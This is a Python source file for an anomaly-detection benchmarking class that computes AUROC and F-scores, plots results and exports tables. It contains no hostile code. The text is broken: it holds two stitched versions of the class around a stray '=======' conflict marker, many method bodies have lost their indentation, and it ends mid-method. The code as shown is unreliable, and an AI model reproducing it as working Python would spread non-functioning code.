for other_evaluator in evaluators[1:]:
assert evaluator.detectors == other_evaluator.detectors, 'All evaluators should use the same detectors'
pivot_benchmarks = [ev.benchmark_results.pivot(index='dataset', columns='algorithm',
values='auroc') for ev in evaluators]
concat_benchmarks = pd.concat(pivot_benchmarks)
auroc_matrix = concat_benchmarks.groupby(['dataset']).mean()
datasets = [[evaluator.get_key_and_value(str(d)) for d in ev.index.values]
for ev in pivot_benchmarks]
datasets = [tuple(d) for d in np.concatenate(datasets)] # Required for MultiIndex.from_tuples
datasets = pd.MultiIndex.from_tuples(datasets, names=['Type', 'Level'])
auroc_matrix.index = datasets
return auroc_matrix
def get_multi_index_dataframe(self):
return Evaluator.to_multi_index_frame([self])
@staticmethod
def plot_heatmap(evaluators, store=True):
mi_df = Evaluator.to_multi_index_frame(evaluators)
detectors, datasets = mi_df.columns, mi_df.index
fig, ax = plt.subplots(figsize=(len(detectors) + 2, len(datasets)))
im = ax.imshow(mi_df, cmap=plt.get_cmap('YlOrRd'), vmin=0, vmax=1)
plt.colorbar(im)
# Show MultiIndex for ordinate
Evaluator.insert_multi_index_yaxis(ax, mi_df)
# Rotate the tick labels and set their alignment.
ax.set_xticks(np.arange(len(detectors)))
ax.set_xticklabels(detectors)
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
# Loop over data dimensions and create text annotations.
for i in range(len(detectors)):
for j in range(len(datasets)):
ax.text(i, j, f'{mi_df.iloc[j, i]:.2f}', ha='center', va='center', color='w',
path_effects=[path_effects.withSimplePatchShadow(
offset=(1, -1), shadow_rgbFace='b', alpha=0.9)])
ax.set_title('AUROC over all datasets and detectors')
# Prevent bug where x axis ticks are completely outside of bounds (matplotlib/issues/5456)
if len(datasets) > 2:
fig.tight_layout()
if store:
evaluators[0].store(fig, 'heatmap', no_counters=True, store_in_figures=True)
return fig
def plot_single_heatmap(self, store=True):
Evaluator.plot_heatmap([self], store)
@staticmethod
def get_printable_runs_results(results):
print_order = ['dataset', 'algorithm', 'accuracy', 'precision', 'recall', 'F1-score', 'F0.1-score', 'auroc']
rename_columns = [col for col in print_order if col not in ['dataset', 'algorithm']]
# calc std and mean for each algorithm per dataset
std_results = results.groupby(['dataset', 'algorithm']).std(ddof=0).fillna(0)
# get rid of multi-index
std_results = std_results.reset_index()
std_results = std_results[print_order]
std_results.rename(inplace=True, index=str,
columns=dict([(old_col, old_col + '_std') for old_col in rename_columns]))
avg_results = results.groupby(['dataset', 'algorithm'], as_index=False).mean()
avg_results = avg_results[print_order]
avg_results_renamed = avg_results.rename(
index=str, columns=dict([(old_col, old_col + '_avg') for old_col in rename_columns]))
return std_results, avg_results, avg_results_renamed
def gen_merged_tables(self, results, title_suffix=None, store=True):
title_suffix = f'_{title_suffix}' if title_suffix else ''
std_results, avg_results, avg_results_renamed = Evaluator.get_printable_runs_results(results)
ds_title_suffix = f'per_dataset{title_suffix}'
self.print_merged_table_per_dataset(std_results)
self.gen_merged_latex_per_dataset(std_results, f'std_{ds_title_suffix}', store=store)
self.print_merged_table_per_dataset(avg_results_renamed)
self.gen_merged_latex_per_dataset(avg_results_renamed, f'avg_{ds_title_suffix}', store=store)
det_title_suffix = f'per_algorithm{title_suffix}'
self.print_merged_table_per_algorithm(std_results)
self.gen_merged_latex_per_algorithm(std_results, f'std_{det_title_suffix}', store=store)
self.print_merged_table_per_algorithm(avg_results_renamed)
self.gen_merged_latex_per_algorithm(avg_results_renamed, f'avg_{det_title_suffix}', store=store)
def binarize(self, score, threshold=None):
threshold = threshold if threshold is not None else self.threshold(score)
score = np.where(np.isnan(score), np.nanmin(score) - sys.float_info.epsilon, score)
return np.where(score >= threshold, 1, 0)
def threshold(self, score):
return np.nanmean(score) + 2 * np.nanstd(score)
=======
import gc
import logging
import os
import pickle
import re
import sys
import traceback
from textwrap import wrap
import matplotlib.pyplot as plt
import matplotlib.patheffects as path_effects
from matplotlib.font_manager import FontProperties
import numpy as np
import pandas as pd
import progressbar
import time
from sklearn.metrics import accuracy_score, fbeta_score
from sklearn.metrics import precision_recall_fscore_support as prf
from sklearn.metrics import roc_curve, auc
from tabulate import tabulate
from .config import init_logging
class Evaluator:
def __init__(self, datasets: list, detectors: callable, output_dir: str = None, seed: int = None,
             create_log_file=True):
    """
    :param datasets: list of datasets; each must expose a unique ``.name`` and a ``.data()`` method
    :param detectors: callable that, given a seed, returns the list of detectors
    :param output_dir: root directory for reports, figures and tables (defaults to 'reports')
    :param seed: seed forwarded to the detectors factory; updated by later runs
    :param create_log_file: if True, additionally log to files below ``<output_dir>/logs``
    """
    assert np.unique([x.name for x in datasets]).size == len(datasets), 'Some datasets have the same name!'
    self.datasets = datasets
    self._detectors = detectors
    self.output_dir = output_dir or 'reports'
    # Maps (dataset name, detector name) -> anomaly score array, filled by evaluate()
    self.results = dict()
    if create_log_file:
        init_logging(os.path.join(self.output_dir, 'logs'))
    self.logger = logging.getLogger(__name__)
    # Dirty hack: Is set by the main.py to insert results from multiple evaluator runs
    self.benchmark_results = None
    # Last passed seed value in evaluate()
    self.seed = seed
@property
def detectors(self):
    """Fresh detector instances from the factory, built with the current seed on every access."""
    detectors = self._detectors(self.seed)
    assert np.unique([x.name for x in detectors]).size == len(detectors), 'Some detectors have the same name!'
    return detectors
def set_benchmark_results(self, benchmark_result):
self.benchmark_results = benchmark_result
def export_results(self, name):
    """Pickle this evaluator's state to ``<output_dir>/evaluators/<name>-<timestamp>.pkl``.

    Stores dataset/detector names, results, benchmark results, output dir and seed.
    :return: the path of the written pickle file
    """
    output_dir = os.path.join(self.output_dir, 'evaluators')
    os.makedirs(output_dir, exist_ok=True)
    timestamp = time.strftime('%Y-%m-%d-%H%M%S')
    path = os.path.join(output_dir, f'{name}-{timestamp}.pkl')
    self.logger.info(f'Store evaluator results at {os.path.abspath(path)}')
    save_dict = {
        'datasets': [x.name for x in self.datasets],
        'detectors': [x.name for x in self.detectors],
        'benchmark_results': self.benchmark_results,
        'results': self.results,
        'output_dir': self.output_dir,
        # NOTE(review): int(self.seed) raises TypeError when seed is None — confirm callers set it
        'seed': int(self.seed),
    }
    with open(path, 'wb') as f:
        pickle.dump(save_dict, f)
    return path
# Import benchmark_results if this evaluator uses the same detectors and datasets
# self.results are not available because they are overwritten by each run
def import_results(self, name):
    """Load a pickle written by export_results and restore benchmark results, seed and results.

    Asserts that the stored detector and dataset names match this evaluator's.
    :param name: file name below ``<output_dir>/evaluators`` without the ``.pkl`` extension
    """
    output_dir = os.path.join(self.output_dir, 'evaluators')
    path = os.path.join(output_dir, f'{name}.pkl')
    self.logger.info(f'Read evaluator results at {os.path.abspath(path)}')
    with open(path, 'rb') as f:
        save_dict = pickle.load(f)
    self.logger.debug(f'Importing detectors {"; ".join(save_dict["detectors"])}')
    my_detectors = [x.name for x in self.detectors]
    assert np.array_equal(save_dict['detectors'], my_detectors), 'Detectors should be the same'
    self.logger.debug(f'Importing datasets {"; ".join(save_dict["datasets"])}')
    my_datasets = [x.name for x in self.datasets]
    assert np.array_equal(save_dict['datasets'], my_datasets), 'Datasets should be the same'
    self.benchmark_results = save_dict['benchmark_results']
    self.seed = save_dict['seed']
    # NOTE(review): self.results IS restored here, contradicting the comment above — verify intent
    self.results = save_dict['results']
@staticmethod
def get_accuracy_precision_recall_fscore(y_true: list, y_pred: list):
    """Return (accuracy, precision, recall, F1, F0.1) for binary predictions.

    F0.1 is defined as 0 when both precision and recall are 0, matching sklearn's
    convention without triggering a division warning.
    """
    accuracy = accuracy_score(y_true, y_pred)
    # warn_for=() avoids log warnings for any result being zero
    precision, recall, f_score, _ = prf(y_true, y_pred, average='binary', warn_for=())
    if precision == 0 and recall == 0:
        f01_score = 0
    else:
        f01_score = fbeta_score(y_true, y_pred, average='binary', beta=0.1)
    return accuracy, precision, recall, f_score, f01_score
@staticmethod
def get_auroc(det, ds, score):
    """Area under the ROC curve of `score` against the dataset's test labels.

    An all-NaN score is treated as all-zero; remaining NaNs are ranked below
    every other value. `det` is unused but kept for interface compatibility.
    """
    if np.isnan(score).all():
        score = np.zeros_like(score)
    _, _, _, y_test = ds.data()
    sanitized = score.copy()
    # Rank NaN below every other value in terms of anomaly score
    sanitized[np.isnan(sanitized)] = np.nanmin(sanitized) - sys.float_info.epsilon
    fpr, tpr, _ = roc_curve(y_test, sanitized)
    return auc(fpr, tpr)
def get_optimal_threshold(self, det, y_test, score, steps=100, return_metrics=False):
    """Scan `steps` evenly spaced thresholds over the score range.

    :return: the F1-maximizing threshold, or — with return_metrics=True —
             (anomaly counts, accuracy, precision, recall, F1, F0.1, thresholds).
    """
    thresholds = np.linspace(np.nanmin(score), np.nanmax(score), steps)
    # Transpose so each metric becomes one row
    metric_rows = np.array(list(self.get_metrics_by_thresholds(y_test, score, thresholds))).T
    anomalies, acc, prec, rec, f_score, f01_score = metric_rows
    if return_metrics:
        return anomalies, acc, prec, rec, f_score, f01_score, thresholds
    return thresholds[np.argmax(f_score)]
def evaluate(self):
    """Fit every detector on every dataset and store the anomaly scores in self.results.

    A detector failure is logged and recorded as an all-zero score so later
    aggregation still works; plotting failures are logged but never abort a run.
    """
    for ds in progressbar.progressbar(self.datasets):
        (X_train, y_train, X_test, y_test) = ds.data()
        for det in progressbar.progressbar(self.detectors):
            self.logger.info(f'Training {det.name} on {ds.name} with seed {self.seed}')
            try:
                det.fit(X_train.copy())
                score = det.predict(X_test.copy())
                self.results[(ds.name, det.name)] = score
                try:
                    self.plot_details(det, ds, score)
                except Exception:
                    # Plotting is best-effort, but silently discarding the error hid real
                    # bugs; log it (with traceback) instead of `pass`
                    self.logger.warning(f'Could not plot details for {det.name} on {ds.name}',
                                        exc_info=True)
            except Exception as e:
                self.logger.error(f'An exception occurred while training {det.name} on {ds}: {e}')
                self.logger.error(traceback.format_exc())
                self.results[(ds.name, det.name)] = np.zeros_like(y_test)
            # Free detector/model memory before the next training run
            gc.collect()
def benchmarks(self) -> pd.DataFrame:
    """Compute metrics for every (dataset, detector) pair from self.results.

    :return: DataFrame with columns dataset, algorithm, accuracy, precision,
             recall, F1-score, F0.1-score, auroc — one row per pair.
    """
    rows = []
    for ds in self.datasets:
        _, _, _, y_test = ds.data()
        for det in self.detectors:
            score = self.results[(ds.name, det.name)]
            y_pred = self.binarize(score, self.get_optimal_threshold(det, y_test, np.array(score)))
            acc, prec, rec, f1_score, f01_score = self.get_accuracy_precision_recall_fscore(y_test, y_pred)
            auroc = self.get_auroc(det, ds, score)
            rows.append({'dataset': ds.name,
                         'algorithm': det.name,
                         'accuracy': acc,
                         'precision': prec,
                         'recall': rec,
                         'F1-score': f1_score,
                         'F0.1-score': f01_score,
                         'auroc': auroc})
    # DataFrame.append was removed in pandas 2.0; building from a list of
    # records is the supported (and faster) equivalent. Downstream code selects
    # columns by name, so column order does not matter.
    return pd.DataFrame(rows)
def get_metrics_by_thresholds(self, y_test: list, score: list, thresholds: list):
    """Yield (anomaly count, accuracy, precision, recall, F1, F0.1) for each threshold."""
    for current_threshold in thresholds:
        predicted = self.binarize(score, threshold=current_threshold)
        yield (predicted.sum(), *Evaluator.get_accuracy_precision_recall_fscore(y_test, predicted))
def plot_scores(self, store=True):
    """Per dataset: plot train data, test data, test labels, then for each detector
    its anomaly score (with the F1-optimal threshold line) and its binarized labels.

    :return: list of figures, one per dataset; each is also stored as PDF when store=True
    """
    detectors = self.detectors
    plt.close('all')
    figures = []
    for ds in self.datasets:
        X_train, y_train, X_test, y_test = ds.data()
        subtitle_loc = 'left'
        fig = plt.figure(figsize=(15, 15))
        fig.canvas.set_window_title(ds.name)
        # Layout: 3 fixed rows (train, test, labels) + 2 rows per detector
        sp = fig.add_subplot((2 * len(detectors) + 3), 1, 1)
        sp.set_title('original training data', loc=subtitle_loc)
        for col in X_train.columns:
            plt.plot(X_train[col])
        sp = fig.add_subplot((2 * len(detectors) + 3), 1, 2)
        sp.set_title('original test set', loc=subtitle_loc)
        for col in X_test.columns:
            plt.plot(X_test[col])
        sp = fig.add_subplot((2 * len(detectors) + 3), 1, 3)
        sp.set_title('binary labels of test set', loc=subtitle_loc)
        plt.plot(y_test)
        subplot_num = 4
        for det in detectors:
            sp = fig.add_subplot((2 * len(detectors) + 3), 1, subplot_num)
            sp.set_title(f'scores of {det.name}', loc=subtitle_loc)
            score = self.results[(ds.name, det.name)]
            plt.plot(np.arange(len(score)), [x for x in score])
            # Constant line marking the F1-optimal threshold over the whole series
            threshold_line = len(score) * [self.get_optimal_threshold(det, y_test, np.array(score))]
            plt.plot([x for x in threshold_line])
            subplot_num += 1
            sp = fig.add_subplot((2 * len(detectors) + 3), 1, subplot_num)
            sp.set_title(f'binary labels of {det.name}', loc=subtitle_loc)
            plt.plot(np.arange(len(score)),
                     [x for x in self.binarize(score, self.get_optimal_threshold(det, y_test, np.array(score)))])
            subplot_num += 1
        fig.subplots_adjust(top=0.9, hspace=0.4)
        fig.tight_layout()
        if store:
            self.store(fig, f'scores_{ds.name}')
        figures.append(fig)
    return figures
def plot_threshold_comparison(self, steps=40, store=True):
    """One subplot per (detector, dataset): anomaly fraction, precision, recall,
    F1 and F0.1 as functions of the binarization threshold.

    :param steps: number of thresholds to scan per pair
    :return: the figure
    """
    detectors = self.detectors
    plt.close('all')
    plots_shape = len(detectors), len(self.datasets)
    fig, axes = plt.subplots(*plots_shape, figsize=(len(detectors) * 15, len(self.datasets) * 5))
    # Ensure two dimensions for iteration
    axes = np.array(axes).reshape(*plots_shape).T
    plt.suptitle('Compare thresholds', fontsize=10)
    for ds, axes_row in zip(self.datasets, axes):
        _, _, X_test, y_test = ds.data()
        for det, ax in zip(detectors, axes_row):
            score = np.array(self.results[(ds.name, det.name)])
            # BUG FIX: `steps` was accepted but never forwarded, so the parameter had no effect
            anomalies, _, prec, rec, f_score, f01_score, thresh = self.get_optimal_threshold(
                det, y_test, score, steps=steps, return_metrics=True)
            ax.plot(thresh, anomalies / len(y_test),
                    label=fr'anomalies ({len(y_test)} $\rightarrow$ 1)')
            ax.plot(thresh, prec, label='precision')
            ax.plot(thresh, rec, label='recall')
            ax.plot(thresh, f_score, label='f_score', linestyle='dashed')
            ax.plot(thresh, f01_score, label='f01_score', linestyle='dashed')
            ax.set_title(f'{det.name} on {ds.name}')
            ax.set_xlabel('Threshold')
            ax.legend()
    # Avoid overlapping title and axis labels
    plt.xlim([0.0, 1.0])
    fig.subplots_adjust(top=0.9, hspace=0.4, right=1, left=0)
    fig.tight_layout()
    if store:
        self.store(fig, 'metrics_by_thresholds')
    return fig
def plot_roc_curves(self, store=True):
    """Plot one ROC curve (with AUC in the legend) per detector for each dataset.

    :return: list of figures, one per dataset; stored as PDFs when store=True
    """
    detectors = self.detectors
    plt.close('all')
    figures = []
    for ds in self.datasets:
        _, _, _, y_test = ds.data()
        fig_scale = 3
        fig = plt.figure(figsize=(fig_scale * len(detectors), fig_scale))
        fig.canvas.set_window_title(ds.name + ' ROC')
        fig.suptitle(f'ROC curve on {ds.name}', fontsize=14, y='1.1')
        subplot_count = 1
        for det in detectors:
            self.logger.info(f'Plotting ROC curve for {det.name} on {ds.name}')
            score = self.results[(ds.name, det.name)]
            if np.isnan(score).all():
                score = np.zeros_like(score)
            # Rank NaN below every other value in terms of anomaly score
            # NOTE(review): this writes into the array stored in self.results (no copy,
            # unlike get_auroc) — later readers see the NaN replacement; confirm intended
            score[np.isnan(score)] = np.nanmin(score) - sys.float_info.epsilon
            fpr, tpr, _ = roc_curve(y_test, score)
            roc_auc = auc(fpr, tpr)
            plt.subplot(1, len(detectors), subplot_count)
            plt.plot(fpr, tpr, color='darkorange',
                     lw=2, label='area = %0.2f' % roc_auc)
            subplot_count += 1
            # Diagonal reference line = random classifier
            plt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')
            plt.xlim([0.0, 1.0])
            plt.ylim([0.0, 1.05])
            plt.xlabel('False Positive Rate')
            plt.ylabel('True Positive Rate')
            plt.gca().set_aspect('equal', adjustable='box')
            plt.title('\n'.join(wrap(det.name, 20)))
            plt.legend(loc='lower right')
        plt.tight_layout()
        if store:
            self.store(fig, f'roc_{ds.name}')
        figures.append(fig)
    return figures
def plot_auroc(self, store=True, title='AUROC'):
    """Bar chart of AUROC per algorithm, one bar group per dataset,
    read from self.benchmark_results."""
    plt.close('all')
    self.benchmark_results[['dataset', 'algorithm', 'auroc']].pivot(
        index='algorithm', columns='dataset', values='auroc').plot(kind='bar')
    plt.legend(loc=3, framealpha=0.5)
    plt.xticks(rotation=20)
    plt.ylabel('AUC', rotation='horizontal', labelpad=20)
    plt.title(title)
    # BUG FIX: the ymin/ymax keywords were removed from pyplot.ylim in matplotlib 3.3;
    # positional (bottom, top) is the supported form
    plt.ylim(0, 1)
    plt.tight_layout()
    if store:
        self.store(plt.gcf(), 'auroc', store_in_figures=True)
def plot_details(self, det, ds, score, store=True):
    """For detectors that expose prediction_details, plot test data, ground truth,
    scores and every detail series in one column of subplots.

    No-op (returns None) when det.details is falsy.
    :return: the figure, or None
    """
    if not det.details:
        return
    plt.close('all')
    cmap = plt.get_cmap('inferno')
    _, _, X_test, y_test = ds.data()
    # Count required subplot rows: one per 1-d detail, one per row of a 2-d detail
    grid = 0
    for value in det.prediction_details.values():
        grid += 1 if value.ndim == 1 else value.shape[0]
    grid += X_test.shape[1]  # data
    grid += 1 + 1  # score and gt
    fig, axes = plt.subplots(grid, 1, figsize=(15, 1.5 * grid))
    i = 0
    c = cmap(i / grid)  # color progresses through the colormap with the row index
    axes[i].set_title('test data')
    for col in X_test.values.T:
        axes[i].plot(col, color=c)
    i += 1
    c = cmap(i / grid)
    axes[i].set_title('test gt data')
    axes[i].plot(y_test.values, color=c)
    i += 1
    c = cmap(i / grid)
    axes[i].set_title('scores')
    axes[i].plot(score, color=c)
    i += 1
    c = cmap(i / grid)
    for key, values in det.prediction_details.items():
        axes[i].set_title(key)
        if values.ndim == 1:
            axes[i].plot(values, color=c)
            i += 1
        elif values.ndim == 2:
            # One subplot row per row of the 2-d detail array
            for v in values:
                axes[i].plot(v, color=c)
                i += 1
        else:
            self.logger.warning('plot_details: not sure what to do')
        c = cmap(i / grid)
    fig.tight_layout()
    if store:
        self.store(fig, f'details_{det.name}_{ds.name}')
    return fig
# create boxplot diagrams for auc values for each algorithm/dataset per algorithm/dataset
def create_boxplots(self, runs, data, detectorwise=True, store=True):
    """Boxplots of AUROC distributions over `runs` runs.

    :param data: DataFrame with at least 'algorithm', 'dataset' and 'auroc' columns
    :param detectorwise: one figure per detector (grouped by dataset) if True,
                         else one per dataset (grouped by algorithm)
    :return: list of figures
    """
    target = 'algorithm' if detectorwise else 'dataset'
    grouped_by = 'dataset' if detectorwise else 'algorithm'
    relevant_results = data[['algorithm', 'dataset', 'auroc']]
    figures = []
    for det_or_ds in (self.detectors if detectorwise else self.datasets):
        relevant_results[relevant_results[target] == det_or_ds.name].boxplot(by=grouped_by, figsize=(15, 15))
        plt.suptitle('')  # boxplot() adds a suptitle
        plt.title(f'AUC grouped by {grouped_by} for {det_or_ds.name} over {runs} runs')
        # BUG FIX: ymin/ymax keywords were removed from pyplot.ylim in matplotlib 3.3
        plt.ylim(0, 1)
        plt.tight_layout()
        fig = plt.gcf()  # fetch the current figure once instead of twice
        figures.append(fig)
        if store:
            self.store(fig, f'boxplot_auc_for_{det_or_ds.name}_{runs}_runs', store_in_figures=True)
    return figures
# create bar charts for averaged pipeline results per algorithm/dataset
def create_bar_charts(self, runs, detectorwise=True, store=True):
    """Bar charts of AUROC values from self.benchmark_results.

    :param detectorwise: one figure per detector (x-axis: dataset) if True,
                         else one per dataset (x-axis: algorithm)
    :return: list of figures
    """
    target = 'algorithm' if detectorwise else 'dataset'
    grouped_by = 'dataset' if detectorwise else 'algorithm'
    relevant_results = self.benchmark_results[['algorithm', 'dataset', 'auroc']]
    figures = []
    for det_or_ds in (self.detectors if detectorwise else self.datasets):
        relevant_results[relevant_results[target] == det_or_ds.name].plot(x=grouped_by, kind='bar', figsize=(7, 7))
        # Clear any leftover suptitle before setting the real title
        plt.suptitle('')
        plt.title(f'AUC for {target} {det_or_ds.name} over {runs} runs')
        # BUG FIX: ymin/ymax keywords were removed from pyplot.ylim in matplotlib 3.3
        plt.ylim(0, 1)
        plt.tight_layout()
        fig = plt.gcf()  # fetch the current figure once instead of twice
        figures.append(fig)
        if store:
            self.store(fig, f'barchart_auc_for_{det_or_ds.name}_{runs}_runs', store_in_figures=True)
    return figures
def store(self, fig, title, extension='pdf', no_counters=False, store_in_figures=False):
    """Save a figure with a timestamped file name below the output directory.

    :param no_counters: omit the '-<n detectors>-<n datasets>' infix in the file name
    :param store_in_figures: save directly in figures/ instead of the per-seed subfolder
    """
    timestamp = time.strftime('%Y-%m-%d-%H%M%S')
    if store_in_figures:
        output_dir = os.path.join(self.output_dir, 'figures')
    else:
        output_dir = os.path.join(self.output_dir, 'figures', f'seed-{self.seed}')
    os.makedirs(output_dir, exist_ok=True)
    counters_str = '' if no_counters else f'-{len(self.detectors)}-{len(self.datasets)}'
    path = os.path.join(output_dir, f'{title}{counters_str}-{timestamp}.{extension}')
    fig.savefig(path)
    self.logger.info(f'Stored plot at {path}')
def store_text(self, content, title, extension='txt'):
    """Write a text/LaTeX table file below ``<output_dir>/tables/seed-<seed>``.

    Uses a Unix-epoch timestamp in the file name (unlike store(), which uses a
    formatted date string).
    """
    timestamp = int(time.time())
    output_dir = os.path.join(self.output_dir, 'tables', f'seed-{self.seed}')
    path = os.path.join(output_dir, f'{title}-{len(self.detectors)}-{len(self.datasets)}-{timestamp}.{extension}')
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as f:
        f.write(content)
    self.logger.info(f'Stored {extension} file at {path}')
def print_merged_table_per_dataset(self, results):
    """Log one psql-style table of `results` rows per dataset."""
    for ds in self.datasets:
        subset = results[results['dataset'] == ds.name]
        table = tabulate(subset, headers='keys', tablefmt='psql')
        self.logger.info(f'Dataset: {ds.name}\n{table}')
def gen_merged_latex_per_dataset(self, results, title_suffix=None, store=True):
    """Build (and optionally store as .tex) a LaTeX table of `results` per dataset."""
    title = f'latex_merged{f"_{title_suffix}" if title_suffix else ""}'
    sections = []
    for ds in self.datasets:
        table = tabulate(results[results['dataset'] == ds.name], headers='keys', tablefmt='latex')
        sections.append(f'{ds.name}:\n\n{table}\n\n')
    content = ''.join(sections)
    if store:
        self.store_text(content=content, title=title, extension='tex')
    return content
def print_merged_table_per_algorithm(self, results):
    """Log one psql-style table of `results` rows per detector."""
    for det in self.detectors:
        subset = results[results['algorithm'] == det.name]
        table = tabulate(subset, headers='keys', tablefmt='psql')
        self.logger.info(f'Detector: {det.name}\n{table}')
def gen_merged_latex_per_algorithm(self, results, title_suffix=None, store=True):
    """Build (and optionally store as .tex) a LaTeX table of `results` per detector."""
    title = f'latex_merged{f"_{title_suffix}" if title_suffix else ""}'
    sections = []
    for det in self.detectors:
        table = tabulate(results[results['algorithm'] == det.name], headers='keys', tablefmt='latex')
        sections.append(f'{det.name}:\n\n{table}\n\n')
    content = ''.join(sections)
    if store:
        self.store_text(content=content, title=title, extension='tex')
    return content
@staticmethod
def translate_var_key(key_name):
if key_name == 'pol':
return 'Pollution'
if key_name == 'mis':
return 'Missing'
if key_name == 'extremeness':
return 'Extremeness'
if key_name == 'f':
return 'Multivariate'
# self.logger('Unexpected dataset name (unknown variable in name)')
return None
@staticmethod
def get_key_and_value(dataset_name):
# Extract var name and value from dataset name
var_re = re.compile(r'.+\((\w*)=(.*)\)')
# e.g. 'Syn Extreme Outliers (pol=0.1)'
match = var_re.search(dataset_name)
if not match:
# self.logger.warn('Unexpected dataset name (not variable in name)')
return '-', dataset_name
var_key = match.group(1)
var_value = match.group(2)
return Evaluator.translate_var_key(var_key), var_value
@staticmethod
def get_dataset_types(mi_df):
types = mi_df.index.get_level_values('Type')
indexes = np.unique(types, return_index=True)[1]
return [types[index] for index in sorted(indexes)]
@staticmethod
def insert_multi_index_yaxis(ax, mi_df):
    """Draw a two-level (Type, Level) y-axis onto `ax` for a heatmap of mi_df:
    Level labels as tick labels, bold rotated Type titles, and separator lines
    between type groups."""
    type_title_offset = -1.6  # depends on string length of xaxis ticklabels
    datasets = mi_df.index
    dataset_types = Evaluator.get_dataset_types(mi_df)  # Returns unique entries keeping original order
    # BUG FIX: the message was missing its f-prefix, so the literal braces were logged
    logging.getLogger(__name__).debug(f'Plotting heatmap for groups {" ".join(dataset_types)}')
    ax.set_yticks(np.arange(len(datasets)))
    ax.set_yticklabels([x[1] for x in datasets])
    y_axis_title_pos = 0  # Store at which position we are for plotting the next title
    for idx, dataset_type in enumerate(dataset_types):
        section_frame = mi_df.iloc[mi_df.index.get_level_values('Type') == dataset_type]
        # Somehow it's sorted by its occurence (which is what we want here)
        dataset_levels = section_frame.index.remove_unused_levels().levels[1]
        # Center the type title vertically within its group of levels
        title_pos = y_axis_title_pos + 0.5 * (len(dataset_levels) - 1)
        ax.text(type_title_offset, title_pos, dataset_type, ha='center', va='center', rotation=90,
                fontproperties=FontProperties(weight='bold'))
        if idx < len(dataset_types) - 1:
            # Underscore run acts as a horizontal separator between type groups
            sep_pos = y_axis_title_pos + (len(dataset_levels) - 0.6)
            ax.text(-0.5, sep_pos, '_' * int(type_title_offset * -10), ha='right', va='center')
        y_axis_title_pos += len(dataset_levels)
@staticmethod
def to_multi_index_frame(evaluators):
    """Merge the benchmark results of several evaluators into one AUROC matrix
    (rows: datasets, columns: algorithms) indexed by a (Type, Level) MultiIndex.

    AUROC values for the same dataset are averaged across evaluators.
    """
    evaluator = evaluators[0]
    for other_evaluator in evaluators[1:]:
        # NOTE(review): compares detector instances, not names — relies on the
        # detectors' equality semantics; confirm this is the intended check
        assert evaluator.detectors == other_evaluator.detectors, 'All evaluators should use the same detectors'
    pivot_benchmarks = [ev.benchmark_results.pivot(index='dataset', columns='algorithm',
                                                   values='auroc') for ev in evaluators]
    concat_benchmarks = pd.concat(pivot_benchmarks)
    auroc_matrix = concat_benchmarks.groupby(['dataset']).mean()
    # Translate each dataset name into a (Type, Level) tuple for the MultiIndex
    datasets = [[evaluator.get_key_and_value(str(d)) for d in ev.index.values]
                for ev in pivot_benchmarks]
    # NOTE(review): if evaluators share dataset names, groupby dedupes rows above but
    # this tuple list keeps duplicates — index lengths would then mismatch; verify
    datasets = [tuple(d) for d in np.concatenate(datasets)]  # Required for MultiIndex.from_tuples
    datasets = pd.MultiIndex.from_tuples(datasets, names=['Type', 'Level'])
    auroc_matrix.index = datasets
    return auroc_matrix
def get_multi_index_dataframe(self):
return Evaluator.to_multi_index_frame([self])
@staticmethod
def plot_heatmap(evaluators, store=True):
    """Render the merged AUROC matrix of all evaluators as an annotated heatmap.

    Rows are datasets (two-level Type/Level axis), columns are detectors; each
    cell shows its AUROC value. Returns the figure.
    """
    mi_df = Evaluator.to_multi_index_frame(evaluators)
    detectors, datasets = mi_df.columns, mi_df.index
    fig, ax = plt.subplots(figsize=(len(detectors) + 2, len(datasets)))
    im = ax.imshow(mi_df, cmap=plt.get_cmap('YlOrRd'), vmin=0, vmax=1)
    plt.colorbar(im)
    # Show MultiIndex for ordinate
    Evaluator.insert_multi_index_yaxis(ax, mi_df)
    # Rotate the tick labels and set their alignment.
    ax.set_xticks(np.arange(len(detectors)))
    ax.set_xticklabels(detectors)
    plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
    # Loop over data dimensions and create text annotations.
    for i in range(len(detectors)):
        for j in range(len(datasets)):
            ax.text(i, j, f'{mi_df.iloc[j, i]:.2f}', ha='center', va='center', color='w',
                    path_effects=[path_effects.withSimplePatchShadow(
                        offset=(1, -1), shadow_rgbFace='b', alpha=0.9)])
    ax.set_title('AUROC over all datasets and detectors')
    # Prevent bug where x axis ticks are completely outside of bounds (matplotlib/issues/5456)
    if len(datasets) > 2:
        fig.tight_layout()
    if store:
        evaluators[0].store(fig, 'heatmap', no_counters=True, store_in_figures=True)
    return fig
def plot_single_heatmap(self, store=True):
    """Plot the AUROC heatmap for this evaluator alone.

    :return: the figure (the original discarded plot_heatmap's return value;
             returning it is backward-compatible for callers that ignored None)
    """
    return Evaluator.plot_heatmap([self], store)
@staticmethod
def get_printable_runs_results(results):
print_order = ['dataset', 'algorithm', 'accuracy', 'precision', 'recall', 'F1-score', 'F0.1-score', 'auroc']
rename_columns = [col for col in print_order if col not in ['dataset', 'algorithm']]
# calc std and mean for each algorithm per dataset
std_results = results.groupby(['dataset', 'algorithm']).std(ddof=0).fillna(0)
# get rid of multi-index
std_results = std_results.reset_index()
std_results = std_results[print_order]
std_results.rename(inplace=True, index=str,
columns=dict([(old_col, old_col + '_std') for old_col in rename_columns]))
avg_results = results.groupby(['dataset', 'algorithm'], as_index=False).mean()
avg_results = avg_results[print_order]
avg_results_renamed = avg_results.rename(
index=str, columns=dict([(old_col, old_col + '_avg') for old_col in rename_columns]))
return std_results, avg_results, avg_results_renamed
def gen_merged_tables(self, results, title_suffix=None, store=True):
    """Print and export (LaTeX) std/avg result tables, grouped per dataset and per algorithm."""
    suffix = f'_{title_suffix}' if title_suffix else ''
    std_results, avg_results, avg_results_renamed = Evaluator.get_printable_runs_results(results)
    # Same sequence as before: per-dataset std, avg, then per-algorithm std, avg
    for group, print_table, gen_latex in (
            ('dataset', self.print_merged_table_per_dataset, self.gen_merged_latex_per_dataset),
            ('algorithm', self.print_merged_table_per_algorithm, self.gen_merged_latex_per_algorithm)):
        group_suffix = f'per_{group}{suffix}'
        print_table(std_results)
        gen_latex(std_results, f'std_{group_suffix}', store=store)
        print_table(avg_results_renamed)
        gen_latex(avg_results_renamed, f'avg_{group_suffix}', store=store)
def binarize(self, score, threshold=None):
threshold = threshold if threshold is not None else self.threshold(score)
